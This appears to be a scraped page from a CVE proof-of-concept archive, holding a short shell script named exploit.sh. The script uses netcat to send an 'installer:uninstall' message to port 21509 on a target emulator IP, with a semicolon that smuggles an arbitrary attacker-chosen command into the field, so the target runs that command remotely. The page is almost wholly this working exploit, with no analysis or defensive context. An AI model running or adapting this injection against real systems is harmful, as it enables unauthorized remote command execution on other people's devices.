4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.sh SH
#!/bin/sh

[ $# -ne 2 ] && { echo "Usage: $0 emulator_ip command_to_execute" >&2; exit 1; }

echo "installer:uninstall;$2" | nc $1 21509